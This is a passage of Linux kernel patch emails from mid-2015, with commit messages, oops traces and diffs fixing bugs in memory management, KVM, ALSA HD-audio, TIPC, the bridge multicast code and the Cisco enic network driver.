Signed-off-by: Johannes Weiner Reported-by: Clark Williams Cc: Fernando Lopez-Lezcano Cc: Steven Rostedt Cc: Thomas Gleixner Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- mm/memcontrol.c | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/mm/memcontrol.c b/mm/memcontrol.c index 9da23a7ec4c0..a04225d372ba 100644 --- a/mm/memcontrol.c +++ b/mm/memcontrol.c @@ -5835,9 +5835,7 @@ void mem_cgroup_swapout(struct page *page, swp_entry_t entry) if (!mem_cgroup_is_root(memcg)) page_counter_uncharge(&memcg->memory, 1); - /* XXX: caller holds IRQ-safe mapping->tree_lock */ - VM_BUG_ON(!irqs_disabled()); - + /* Caller disabled preemption with mapping->tree_lock */ mem_cgroup_charge_statistics(memcg, page, -1); memcg_check_events(memcg, page); } From 02f7b4145da113683ad64c74bf64605e16b71789 Mon Sep 17 00:00:00 2001 From: Sergey Senozhatsky Date: Wed, 10 Jun 2015 11:14:57 -0700 Subject: [PATCH 812/872] zsmalloc: fix a null pointer dereference in destroy_handle_cache() If zs_create_pool()->create_handle_cache()->kmem_cache_create() or pool->name allocation fails, zs_create_pool()->destroy_handle_cache() will dereference the NULL pool->handle_cachep. Modify destroy_handle_cache() to avoid this. Signed-off-by: Sergey Senozhatsky Cc: Minchan Kim Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- mm/zsmalloc.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/mm/zsmalloc.c b/mm/zsmalloc.c index 08bd7a3d464a..a8b5e749e84e 100644 --- a/mm/zsmalloc.c +++ b/mm/zsmalloc.c @@ -289,7 +289,8 @@ static int create_handle_cache(struct zs_pool *pool) static void destroy_handle_cache(struct zs_pool *pool) { - kmem_cache_destroy(pool->handle_cachep); + if (pool->handle_cachep) + kmem_cache_destroy(pool->handle_cachep); } static unsigned long alloc_handle(struct zs_pool *pool) From 8e76d4eecf7afeec9328e21cd5880e281838d0d6 Mon Sep 17 00:00:00 2001 From: Mel Gorman Date: Wed, 10 Jun 2015 11:15:00 -0700 Subject: [PATCH 813/872] sched, numa: do not hint for NUMA balancing on VM_MIXEDMAP mappings Jovi Zhangwei reported the following problem Below kernel vm bug can be triggered by tcpdump which mmaped a lot of pages with GFP_COMP flag. [Mon May 25 05:29:33 2015] page:ffffea0015414000 count:66 mapcount:1 mapping: (null) index:0x0 [Mon May 25 05:29:33 2015] flags: 0x20047580004000(head) [Mon May 25 05:29:33 2015] page dumped because: VM_BUG_ON_PAGE(compound_order(page) && !PageTransHuge(page)) [Mon May 25 05:29:33 2015] ------------[ cut here ]------------ [Mon May 25 05:29:33 2015] kernel BUG at mm/migrate.c:1661! [Mon May 25 05:29:33 2015] invalid opcode: 0000 [#1] SMP In this case it was triggered by running tcpdump but it's not necessary reproducible on all systems. sudo tcpdump -i bond0.100 'tcp port 4242' -c 100000000000 -w 4242.pcap Compound pages cannot be migrated and it was not expected that such pages be marked for NUMA balancing. This did not take into account that drivers such as net/packet/af_packet.c may insert compound pages into userspace with vm_insert_page. This patch tells the NUMA balancing protection scanner to skip all VM_MIXEDMAP mappings which avoids the possibility that compound pages are marked for migration. 
Signed-off-by: Mel Gorman Reported-by: Jovi Zhangwei Cc: Ingo Molnar Cc: Peter Zijlstra Cc: Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- kernel/sched/fair.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c index ffeaa4105e48..c2980e8733bc 100644 --- a/kernel/sched/fair.c +++ b/kernel/sched/fair.c @@ -2181,7 +2181,7 @@ void task_numa_work(struct callback_head *work) } for (; vma; vma = vma->vm_next) { if (!vma_migratable(vma) || !vma_policy_mof(vma) || - is_vm_hugetlb_page(vma)) { + is_vm_hugetlb_page(vma) || (vma->vm_flags & VM_MIXEDMAP)) { continue; } From 5ec45a192fe6e287f0fc06d5ca4f3bd446d94803 Mon Sep 17 00:00:00 2001 From: Andrew Morton Date: Wed, 10 Jun 2015 11:15:02 -0700 Subject: [PATCH 814/872] arch/x86/kvm/mmu.c: work around gcc-4.4.4 bug Fix this compile issue with gcc-4.4.4: arch/x86/kvm/mmu.c: In function 'kvm_mmu_pte_write': arch/x86/kvm/mmu.c:4256: error: unknown field 'cr0_wp' specified in initializer arch/x86/kvm/mmu.c:4257: error: unknown field 'cr4_pae' specified in initializer arch/x86/kvm/mmu.c:4257: warning: excess elements in union initializer ... gcc-4.4.4 (at least) has issues when using anonymous unions in initializers. Fixes: edc90b7dc4ceef6 ("KVM: MMU: fix SMAP virtualization") Cc: Xiao Guangrong Cc: Paolo Bonzini Cc: Davidlohr Bueso Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- arch/x86/kvm/mmu.c | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/arch/x86/kvm/mmu.c b/arch/x86/kvm/mmu.c index 44a7d2515497..b73337634214 100644 --- a/arch/x86/kvm/mmu.c +++ b/arch/x86/kvm/mmu.c @@ -4215,13 +4215,13 @@ void kvm_mmu_pte_write(struct kvm_vcpu *vcpu, gpa_t gpa, u64 entry, gentry, *spte; int npte; bool remote_flush, local_flush, zap_page; - union kvm_mmu_page_role mask = (union kvm_mmu_page_role) { - .cr0_wp = 1, - .cr4_pae = 1, - .nxe = 1, - .smep_andnot_wp = 1, - .smap_andnot_wp = 1, - }; + union kvm_mmu_page_role mask = { }; + + mask.cr0_wp = 1; + mask.cr4_pae = 1; + mask.nxe = 1; + mask.smep_andnot_wp = 1; + mask.smap_andnot_wp = 1; /* * If we don't have indirect shadow pages, it means no page is From bf06848bdbe549175d25d2327ab9f37d4bd556b7 Mon Sep 17 00:00:00 2001 From: Takashi Iwai Date: Wed, 10 Jun 2015 12:03:49 +0200 Subject: [PATCH 815/872] ALSA: hda - Continue probing even if i915 binding fails Currently snd-hda-intel driver aborts the probing of Intel HD-audio controller with i915 power well management when binding with i915 driver via hda_i915_init() fails. This is no big problem for Haswell and Broadwell where the HD-audio controllers are dedicated to HDMI/DP, thus i915 link is mandatory. However, Skylake, Baytrail and Braswell have only one controller and both HDMI/DP and analog codecs share the same bus. Thus, even if HDMI/DP isn't usable, we should keep the controller working for other codecs. For fixing this, this patch simply allows continuing the probing even if hda_i915_init() call fails. This may leave stale sound components for HDMI/DP devices that are unbound with graphics. We could abort the probing selectively, but from the code simplicity POV, it's better to continue in all cases. 
Reported-by: Libin Yang Signed-off-by: Takashi Iwai --- sound/pci/hda/hda_intel.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/sound/pci/hda/hda_intel.c b/sound/pci/hda/hda_intel.c index fea198c58196..8a0af6770e1d 100644 --- a/sound/pci/hda/hda_intel.c +++ b/sound/pci/hda/hda_intel.c @@ -1855,7 +1855,7 @@ static int azx_probe_continue(struct azx *chip) #ifdef CONFIG_SND_HDA_I915 err = hda_i915_init(hda); if (err < 0) - goto out_free; + goto skip_i915; err = hda_display_power(hda, true); if (err < 0) { dev_err(chip->card->dev, @@ -1865,6 +1865,7 @@ static int azx_probe_continue(struct azx *chip) #endif } + skip_i915: err = azx_first_init(chip); if (err < 0) goto out_free; From b3be5e3e726a6cc849f40c70c3ae525e4146e9df Mon Sep 17 00:00:00 2001 From: Erik Hugne Date: Tue, 9 Jun 2015 17:27:12 +0200 Subject: [PATCH 816/872] tipc: disconnect socket directly after probe failure If the TIPC connection timer expires in a probing state, a self abort message is supposed to be generated and delivered to the local socket. This is currently broken, and the abort message is actually sent out to the peer node with invalid addressing information. This will cause the link to enter a constant retransmission state and eventually reset. We fix this by removing the self-abort message creation and tear down connection immediately instead. Signed-off-by: Erik Hugne Reviewed-by: Ying Xue Reviewed-by: Jon Maloy Signed-off-by: David S. Miller --- net/tipc/socket.c | 16 +++++++++++----- 1 file changed, 11 insertions(+), 5 deletions(-) diff --git a/net/tipc/socket.c b/net/tipc/socket.c index 9074b5cede38..f485600c4507 100644 --- a/net/tipc/socket.c +++ b/net/tipc/socket.c @@ -2142,11 +2142,17 @@ static void tipc_sk_timeout(unsigned long data) peer_node = tsk_peer_node(tsk); if (tsk->probing_state == TIPC_CONN_PROBING) { - /* Previous probe not answered -> self abort */ - skb = tipc_msg_create(TIPC_CRITICAL_IMPORTANCE, - TIPC_CONN_MSG, SHORT_H_SIZE, 0, - own_node, peer_node, tsk->portid, - peer_port, TIPC_ERR_NO_PORT); + if (!sock_owned_by_user(sk)) { + sk->sk_socket->state = SS_DISCONNECTING; + tsk->connected = 0; + tipc_node_remove_conn(sock_net(sk), tsk_peer_node(tsk), + tsk_peer_port(tsk)); + sk->sk_state_change(sk); + } else { + /* Try again later */ + sk_reset_timer(sk, &sk->sk_timer, (HZ / 20)); + } + } else { skb = tipc_msg_create(CONN_MANAGER, CONN_PROBE, INT_H_SIZE, 0, peer_node, own_node, From 1a040eaca1a22f8da8285ceda6b5e4a2cb704867 Mon Sep 17 00:00:00 2001 From: Nikolay Aleksandrov Date: Tue, 9 Jun 2015 10:23:57 -0700 Subject: [PATCH 817/872] bridge: fix multicast router rlist endless loop Since the addition of sysfs multicast router support if one set multicast_router to "2" more than once, then the port would be added to the hlist every time and could end up linking to itself and thus causing an endless loop for rlist walkers. So to reproduce just do: echo 2 > multicast_router; echo 2 > multicast_router; in a bridge port and let some igmp traffic flow, for me it hangs up in br_multicast_flood(). Fix this by adding a check in br_multicast_add_router() if the port is already linked. The reason this didn't happen before the addition of multicast_router sysfs entries is because there's a !hlist_unhashed check that prevents it. Signed-off-by: Nikolay Aleksandrov Fixes: 0909e11758bd ("bridge: Add multicast_router sysfs entries") Acked-by: Herbert Xu Signed-off-by: David S. 
Miller --- net/bridge/br_multicast.c | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/net/bridge/br_multicast.c b/net/bridge/br_multicast.c index 22fd0419b314..ff667e18b2d6 100644 --- a/net/bridge/br_multicast.c +++ b/net/bridge/br_multicast.c @@ -1167,6 +1167,9 @@ static void br_multicast_add_router(struct net_bridge *br, struct net_bridge_port *p; struct hlist_node *slot = NULL; + if (!hlist_unhashed(&port->rlist)) + return; + hlist_for_each_entry(p, &br->router_list, rlist) { if ((unsigned long) port >= (unsigned long) p) break; @@ -1194,12 +1197,8 @@ static void br_multicast_mark_router(struct net_bridge *br, if (port->multicast_router != 1) return; - if (!hlist_unhashed(&port->rlist)) - goto timer; - br_multicast_add_router(br, port); -timer: mod_timer(&port->multicast_router_timer, now + br->multicast_querier_interval); } From 07f668ae509c92ba41baabc761607a61b5397317 Mon Sep 17 00:00:00 2001 From: Hajime Tazaki Date: Thu, 11 Jun 2015 14:37:39 +0900 Subject: [PATCH 818/872] lib: add FOU and L2TP to defconfig Signed-off-by: Hajime Tazaki --- arch/lib/defconfig | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/arch/lib/defconfig b/arch/lib/defconfig index 9307e6f7eb41..17b648bcca13 100644 --- a/arch/lib/defconfig +++ b/arch/lib/defconfig @@ -70,9 +70,9 @@ CONFIG_IP_PIMSM_V1=y CONFIG_IP_PIMSM_V2=y CONFIG_SYN_COOKIES=y # CONFIG_NET_IPVTI is not set -CONFIG_NET_UDP_TUNNEL=m -# CONFIG_NET_FOU is not set -# CONFIG_NET_FOU_IP_TUNNELS is not set +CONFIG_NET_UDP_TUNNEL=y +CONFIG_NET_FOU=y +CONFIG_NET_FOU_IP_TUNNELS=y # CONFIG_GENEVE is not set CONFIG_INET_AH=y CONFIG_INET_ESP=y @@ -363,8 +363,10 @@ CONFIG_ATM_LANE=m CONFIG_ATM_MPOA=m CONFIG_ATM_BR2684=m CONFIG_ATM_BR2684_IPFILTER=y -CONFIG_L2TP=m -# CONFIG_L2TP_V3 is not set +CONFIG_L2TP=y +CONFIG_L2TP_V3=y +CONFIG_L2TP_IP=y +CONFIG_L2TP_ETH=y CONFIG_STP=m CONFIG_GARP=m CONFIG_BRIDGE=m From ae9b00a1943c6675638157501dfdd6d4d4af46c1 Mon Sep 17 00:00:00 2001 From: Hajime Tazaki Date: Thu, 11 Jun 2015 14:39:29 +0900 Subject: [PATCH 819/872] lib: fix atomic64_add to avoid external symbol atomic64_add() is used when the "ip l2tp" command is used and caused an unresolved symbol issue. This commit fixes this issue.
Signed-off-by: Hajime Tazaki --- arch/lib/include/asm/atomic.h | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/arch/lib/include/asm/atomic.h b/arch/lib/include/asm/atomic.h index 444a9535c97b..f72c3a8ca48c 100644 --- a/arch/lib/include/asm/atomic.h +++ b/arch/lib/include/asm/atomic.h @@ -13,7 +13,10 @@ typedef struct { #define ATOMIC64_INIT(i) { (i) } #define atomic64_read(v) (*(volatile long *)&(v)->counter) -void atomic64_add(long i, atomic64_t *v); +static inline void atomic64_add(long i, atomic64_t *v) +{ + v->counter += i; +} static inline void atomic64_sub(long i, atomic64_t *v) { v->counter -= i; From 5d753610277862fd8050901f38b6571b9500cdb6 Mon Sep 17 00:00:00 2001 From: Mel Gorman Date: Wed, 10 Jun 2015 21:02:04 -0400 Subject: [PATCH 820/872] net, swap: Remove a warning and clarify why sk_mem_reclaim is required when deactivating swap Jeff Layton reported the following; [ 74.232485] ------------[ cut here ]------------ [ 74.233354] WARNING: CPU: 2 PID: 754 at net/core/sock.c:364 sk_clear_memalloc+0x51/0x80() [ 74.234790] Modules linked in: cts rpcsec_gss_krb5 nfsv4 dns_resolver nfs fscache xfs libcrc32c snd_hda_codec_generic snd_hda_intel snd_hda_controller snd_hda_codec snd_hda_core snd_hwdep snd_seq snd_seq_device nfsd snd_pcm snd_timer snd e1000 ppdev parport_pc joydev parport pvpanic soundcore floppy serio_raw i2c_piix4 pcspkr nfs_acl lockd virtio_balloon acpi_cpufreq auth_rpcgss grace sunrpc qxl drm_kms_helper ttm drm virtio_console virtio_blk virtio_pci ata_generic virtio_ring pata_acpi virtio [ 74.243599] CPU: 2 PID: 754 Comm: swapoff Not tainted 4.1.0-rc6+ #5 [ 74.244635] Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011 [ 74.245546] 0000000000000000 0000000079e69e31 ffff8800d066bde8 ffffffff8179263d [ 74.246786] 0000000000000000 0000000000000000 ffff8800d066be28 ffffffff8109e6fa [ 74.248175] 0000000000000000 ffff880118d48000 ffff8800d58f5c08 ffff880036e380a8 [ 74.249483] Call Trace: [ 74.249872] [] dump_stack+0x45/0x57 [ 74.250703] [] warn_slowpath_common+0x8a/0xc0 [ 74.251655] [] warn_slowpath_null+0x1a/0x20 [ 74.252585] [] sk_clear_memalloc+0x51/0x80 [ 74.253519] [] xs_disable_swap+0x42/0x80 [sunrpc] [ 74.254537] [] rpc_clnt_swap_deactivate+0x7e/0xc0 [sunrpc] [ 74.255610] [] nfs_swap_deactivate+0x27/0x30 [nfs] [ 74.256582] [] destroy_swap_extents+0x74/0x80 [ 74.257496] [] SyS_swapoff+0x222/0x5c0 [ 74.258318] [] ? syscall_trace_leave+0xc7/0x140 [ 74.259253] [] system_call_fastpath+0x12/0x71 [ 74.260158] ---[ end trace 2530722966429f10 ]--- The warning in question was unnecessary but with Jeff's series the rules are also clearer. This patch removes the warning and updates the comment to explain why sk_mem_reclaim() may still be called. [jlayton: remove if (sk->sk_forward_alloc) conditional. As Leon points out that it's not needed.] Cc: Leon Romanovsky Signed-off-by: Mel Gorman Signed-off-by: Jeff Layton Signed-off-by: David S. Miller --- net/core/sock.c | 13 +++++-------- 1 file changed, 5 insertions(+), 8 deletions(-) diff --git a/net/core/sock.c b/net/core/sock.c index 292f42228bfb..469d6039c7f5 100644 --- a/net/core/sock.c +++ b/net/core/sock.c @@ -354,15 +354,12 @@ void sk_clear_memalloc(struct sock *sk) /* * SOCK_MEMALLOC is allowed to ignore rmem limits to ensure forward - * progress of swapping. However, if SOCK_MEMALLOC is cleared while - * it has rmem allocations there is a risk that the user of the - * socket cannot make forward progress due to exceeding the rmem - * limits. 
By rights, sk_clear_memalloc() should only be called - * on sockets being torn down but warn and reset the accounting if - * that assumption breaks. + * progress of swapping. SOCK_MEMALLOC may be cleared while + * it has rmem allocations due to the last swapfile being deactivated + * but there is a risk that the socket is unusable due to exceeding + * the rmem limits. Reclaim the reserves and obey rmem limits again. */ - if (WARN_ON(sk->sk_forward_alloc)) - sk_mem_reclaim(sk); + sk_mem_reclaim(sk); } EXPORT_SYMBOL_GPL(sk_clear_memalloc); From 6286e8285078ab02b215bba1d42a05ecfd864515 Mon Sep 17 00:00:00 2001 From: Govindarajulu Varadarajan <_govind@gmx.com> Date: Thu, 11 Jun 2015 11:52:54 +0530 Subject: [PATCH 821/872] enic: unlock napi busy poll before unmasking intr There is a small window between vnic_intr_unmask() and enic_poll_unlock_napi(). In this window if an irq occurs and napi is scheduled on different cpu, it tries to acquire enic_poll_lock_napi() and hits the following WARN_ON message. Fix is to unlock napi_poll before unmasking the interrupt. [ 781.121746] ------------[ cut here ]------------ [ 781.121789] WARNING: CPU: 1 PID: 0 at drivers/net/ethernet/cisco/enic/vnic_rq.h:228 enic_poll_msix_rq+0x36a/0x3c0 [enic]() [ 781.121834] Modules linked in: nfsv3 nfs_acl rpcsec_gss_krb5 auth_rpcgss oid_registry nfsv4 dns_resolver coretemp intel_rapl iosf_mbi x86_pkg_temp_thermal intel_powerclamp kvm_intel kvm crct10dif_pclmul crc32_pclmul ghash_clmulni_intel aesni_intel mgag200 ttm drm_kms_helper joydev aes_x86_64 lrw drm gf128mul mousedev glue_helper sb_edac ablk_helper iTCO_wdt iTCO_vendor_support evdev ipmi_si syscopyarea sysfillrect sysimgblt i2c_algo_bit i2c_core edac_core lpc_ich mac_hid cryptd pcspkr ipmi_msghandler shpchp tpm_tis acpi_power_meter tpm wmi processor hwmon button ac sch_fq_codel nfs lockd grace sunrpc fscache hid_generic usbhid hid ehci_pci ehci_hcd sd_mod megaraid_sas usbcore scsi_mod usb_common enic crc32c_generic crc32c_intel btrfs xor raid6_pq ext4 crc16 mbcache jbd2 [ 781.122176] CPU: 1 PID: 0 Comm: swapper/1 Not tainted 4.1.0-rc6-ARCH-00040-gc46a024-dirty #106 [ 781.122210] Hardware name: Cisco Systems Inc UCSB-B200-M4/UCSB-B200-M4, BIOS B200M4.2.2.2.23.061220140128 06/12/2014 [ 781.122252] 0000000000000000 bddbbc9d655ec96e ffff880277e43da8 ffffffff81583fe8 [ 781.122286] 0000000000000000 0000000000000000 ffff880277e43de8 ffffffff8107acfa [ 781.122319] ffff880272c01000 ffff880273f18000 ffff880273f1a100 0000000000000000 [ 781.122352] Call Trace: [ 781.122364] [] dump_stack+0x4f/0x7b [ 781.122399] [] warn_slowpath_common+0x8a/0xc0 [ 781.122425] [] warn_slowpath_null+0x1a/0x20 [ 781.122455] [] enic_poll_msix_rq+0x36a/0x3c0 [enic] [ 781.122487] [] net_rx_action+0x22a/0x370 [ 781.122512] [] __do_softirq+0xed/0x2d0 [ 781.122537] [] irq_exit+0x7e/0xa0 [ 781.122560] [] do_IRQ+0x64/0x100 [ 781.122582] [] common_interrupt+0x6e/0x6e [ 781.122605] [] ? cpu_startup_entry+0x121/0x480 [ 781.122638] [] ? cpu_startup_entry+0xec/0x480 [ 781.122667] [] ? clockevents_register_device+0x113/0x1f0 [ 781.122698] [] start_secondary+0x196/0x1e0 [ 781.122723] ---[ end trace cec2e9dd3af7b9db ]--- Signed-off-by: Govindarajulu Varadarajan <_govind@gmx.com> Signed-off-by: David S. 
Miller --- drivers/net/ethernet/cisco/enic/enic_main.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/ethernet/cisco/enic/enic_main.c b/drivers/net/ethernet/cisco/enic/enic_main.c index 204bd182473b..0e5a01dd7545 100644 --- a/drivers/net/ethernet/cisco/enic/enic_main.c +++ b/drivers/net/ethernet/cisco/enic/enic_main.c @@ -1407,6 +1407,7 @@ static int enic_poll_msix_rq(struct napi_struct *napi, int budget) */ enic_calc_int_moderation(enic, &enic->rq[rq]); + enic_poll_unlock_napi(&enic->rq[rq]); if (work_done < work_to_do) { /* Some work done, but not enough to stay in polling, @@ -1418,7 +1419,6 @@ static int enic_poll_msix_rq(struct napi_struct *napi, int budget) enic_set_int_moderation(enic, &enic->rq[rq]); vnic_intr_unmask(&enic->intr[intr]); } - enic_poll_unlock_napi(&enic->rq[rq]); return work_done; } From 19b596bda1c5400808635fde0d521c1f89a6c1a3 Mon Sep 17 00:00:00 2001 From: Govindarajulu Varadarajan <_govind@gmx.com> Date: Thu, 11 Jun 2015 11:52:55 +0530 Subject: [PATCH 822/872] enic: check return value for stat dump We do not check the return value of enic_dev_stats_dump(). If allocation fails, we will hit NULL pointer reference. Return only if memory allocation fails. For other failures, we return the previously recorded values. Signed-off-by: Govindarajulu Varadarajan <_govind@gmx.com> Signed-off-by: David S. Miller --- .../net/ethernet/cisco/enic/enic_ethtool.c | 20 ++++++++++++++++--- drivers/net/ethernet/cisco/enic/enic_main.c | 9 ++++++++- 2 files changed, 25 insertions(+), 4 deletions(-) diff --git a/drivers/net/ethernet/cisco/enic/enic_ethtool.c b/drivers/net/ethernet/cisco/enic/enic_ethtool.c index 28d9ca675a27..68d47b196dae 100644 --- a/drivers/net/ethernet/cisco/enic/enic_ethtool.c +++ b/drivers/net/ethernet/cisco/enic/enic_ethtool.c @@ -131,8 +131,15 @@ static void enic_get_drvinfo(struct net_device *netdev, { struct enic *enic = netdev_priv(netdev); struct vnic_devcmd_fw_info *fw_info; + int err; - enic_dev_fw_info(enic, &fw_info); + err = enic_dev_fw_info(enic, &fw_info); + /* return only when pci_zalloc_consistent fails in vnic_dev_fw_info + * For other failures, like devcmd failure, we return previously + * recorded info. + */ + if (err == -ENOMEM) + return; strlcpy(drvinfo->driver, DRV_NAME, sizeof(drvinfo->driver)); strlcpy(drvinfo->version, DRV_VERSION, sizeof(drvinfo->version)); @@ -181,8 +188,15 @@ static void enic_get_ethtool_stats(struct net_device *netdev, struct enic *enic = netdev_priv(netdev); struct vnic_stats *vstats; unsigned int i; - - enic_dev_stats_dump(enic, &vstats); + int err; + + err = enic_dev_stats_dump(enic, &vstats); + /* return only when pci_zalloc_consistent fails in vnic_dev_stats_dump + * For other failures, like devcmd failure, we return previously + * recorded stats. 
+ */ + if (err == -ENOMEM) + return; for (i = 0; i < enic_n_tx_stats; i++) *(data++) = ((u64 *)&vstats->tx)[enic_tx_stats[i].index]; diff --git a/drivers/net/ethernet/cisco/enic/enic_main.c b/drivers/net/ethernet/cisco/enic/enic_main.c index 0e5a01dd7545..eadae1b412c6 100644 --- a/drivers/net/ethernet/cisco/enic/enic_main.c +++ b/drivers/net/ethernet/cisco/enic/enic_main.c @@ -615,8 +615,15 @@ static struct rtnl_link_stats64 *enic_get_stats(struct net_device *netdev, { struct enic *enic = netdev_priv(netdev); struct vnic_stats *stats; + int err; - enic_dev_stats_dump(enic, &stats); + err = enic_dev_stats_dump(enic, &stats); + /* return only when pci_zalloc_consistent fails in vnic_dev_stats_dump + * For other failures, like devcmd failure, we return previously + * recorded stats. + */ + if (err == -ENOMEM) + return net_stats; net_stats->tx_packets = stats->tx.tx_frames_ok; net_stats->tx_bytes = stats->tx.tx_bytes_ok; From 8b13b4e0bc884ba7dc8ee4de3ee915b7d30e7f78 Mon Sep 17 00:00:00 2001 From: Govindarajulu Varadarajan <_govind@gmx.com> Date: Thu, 11 Jun 2015 11:52:56 +0530 Subject: [PATCH 823/872] enic: fix memory leak in rq_clean When incoming packet qualifies for rx_copybreak, we copy the data to newly allocated skb. We do not free/unmap the original buffer. At this point driver assumes this buffer is unallocated. When enic_rq_alloc_buf() is called for buffer allocation, it checks if buf->os_buf is NULL. If its not NULL that means buffer can be re-used. When vnic_rq_clean() is called for freeing all rq buffers, and if the rx_copybreak reused buffer falls outside the used desc, we do not free the buffer. The following trace is observer when dma-debug is enabled. Fix is to walk through complete ring and clean if buffer is present. [ 40.555386] ------------[ cut here ]------------ [ 40.555396] WARNING: CPU: 0 PID: 491 at lib/dma-debug.c:971 dma_debug_device_change+0x188/0x1f0() [ 40.555400] pci 0000:06:00.0: DMA-API: device driver has pending DMA allocations while released from device [count=4] One of leaked entries details: [device address=0x00000000ff4cc040] [size=9018 bytes] [mapped with DMA_FROM_DEVICE] [mapped as single] [ 40.555402] Modules linked in: nfsv3 nfs_acl rpcsec_gss_krb5 auth_rpcgss oid_registry nfsv4 dns_resolver coretemp intel_rapl iosf_mbi x86_pkg_temp_thermal intel_powerclamp kvm_intel kvm crct10dif_pclmul crc32_pclmul ghash_clmulni_intel aesni_intel aes_x86_64 lrw joydev mousedev gf128mul hid_generic glue_helper mgag200 usbhid ttm hid drm_kms_helper drm ablk_helper syscopyarea sysfillrect sysimgblt i2c_algo_bit i2c_core iTCO_wdt cryptd mac_hid evdev pcspkr sb_edac edac_core tpm_tis iTCO_vendor_support ipmi_si wmi tpm ipmi_msghandler shpchp lpc_ich processor acpi_power_meter hwmon button ac sch_fq_codel nfs lockd grace sunrpc fscache sd_mod ehci_pci ehci_hcd megaraid_sas usbcore scsi_mod usb_common enic(-) crc32c_generic crc32c_intel btrfs xor raid6_pq ext4 crc16 mbcache jbd2 [ 40.555467] CPU: 0 PID: 491 Comm: rmmod Not tainted 4.1.0-rc7-ARCH-01305-gf59b71f #118 [ 40.555469] Hardware name: Cisco Systems Inc UCSB-B200-M4/UCSB-B200-M4, BIOS B200M4.2.2.2.23.061220140128 06/12/2014 [ 40.555471] 0000000000000000 00000000e2f8a5b7 ffff880275f8bc48 ffffffff8158d6f0 [ 40.555474] 0000000000000000 ffff880275f8bca0 ffff880275f8bc88 ffffffff8107b04a [ 40.555477] ffff8802734e0000 0000000000000004 ffff8804763fb3c0 ffff88027600b650 [ 40.555480] Call Trace: [ 40.555488] [] dump_stack+0x4f/0x7b [ 40.555492] [] warn_slowpath_common+0x8a/0xc0 [ 40.555494] [] warn_slowpath_fmt+0x55/0x70 [ 
40.555498] [] dma_debug_device_change+0x188/0x1f0 [ 40.555503] [] notifier_call_chain+0x4f/0x80 [ 40.555506] [] __blocking_notifier_call_chain+0x4b/0x70 [ 40.555510] [] blocking_notifier_call_chain+0x16/0x20 [ 40.555514] [] __device_release_driver+0xf6/0x120 [ 40.555518] [] driver_detach+0xc8/0xd0 [ 40.555523] [] bus_remove_driver+0x59/0xe0 [ 40.555527] [] driver_unregister+0x30/0x70 [ 40.555534] [] pci_unregister_driver+0x2d/0xa0 [ 40.555542] [] enic_cleanup_module+0x10/0x14e [enic] [ 40.555547] [] SyS_delete_module+0x1cf/0x280 [ 40.555551] [] ? ____fput+0xe/0x10 [ 40.555554] [] ? task_work_run+0xbc/0xf0 [ 40.555558] [] system_call_fastpath+0x12/0x71 [ 40.555561] ---[ end trace 4988cadc77c2b236 ]--- [ 40.555562] Mapped at: [ 40.555563] [] debug_dma_map_page+0x95/0x150 [ 40.555566] [] enic_rq_alloc_buf+0x1b8/0x360 [enic] [ 40.555570] [] enic_open+0xf8/0x820 [enic] [ 40.555574] [] __dev_open+0xce/0x150 [ 40.555579] [] __dev_change_flags+0xa1/0x170 Signed-off-by: Govindarajulu Varadarajan <_govind@gmx.com> Signed-off-by: David S. Miller --- drivers/net/ethernet/cisco/enic/vnic_rq.c | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/drivers/net/ethernet/cisco/enic/vnic_rq.c b/drivers/net/ethernet/cisco/enic/vnic_rq.c index 36a2ed606c91..c4b2183bf352 100644 --- a/drivers/net/ethernet/cisco/enic/vnic_rq.c +++ b/drivers/net/ethernet/cisco/enic/vnic_rq.c @@ -188,16 +188,15 @@ void vnic_rq_clean(struct vnic_rq *rq, struct vnic_rq_buf *buf; u32 fetch_index; unsigned int count = rq->ring.desc_count; + int i; buf = rq->to_clean; - while (vnic_rq_desc_used(rq) > 0) { - + for (i = 0; i < rq->ring.desc_count; i++) { (*buf_clean)(rq, buf); - - buf = rq->to_clean = buf->next; - rq->ring.desc_avail++; + buf = buf->next; } + rq->ring.desc_avail = rq->ring.desc_count - 1; /* Use current fetch_index as the ring starting point */ fetch_index = ioread32(&rq->ctrl->fetch_index); From a686ec4c5f28eb1b384e4b87b08543155c970072 Mon Sep 17 00:00:00 2001 From: Takashi Iwai Date: Thu, 11 Jun 2015 10:51:28 +0200 Subject: [PATCH 824/872] ALSA: hda - Re-add the lost fake mute support Yet another regression by the transition to regmap cache; for better usability, we had the fake mute control using the zero amp value for Conexant codecs, and this was forgotten in the new hda core code. Since the bits 4-7 are unused for the amp registers (as we follow the syntax of AMP_GET verb), the bit 4 is now used to indicate the fake mute. For setting this flag, snd_hda_codec_amp_update() becomes a function from a simple macro. The bonus is that it gained a proper function description. 
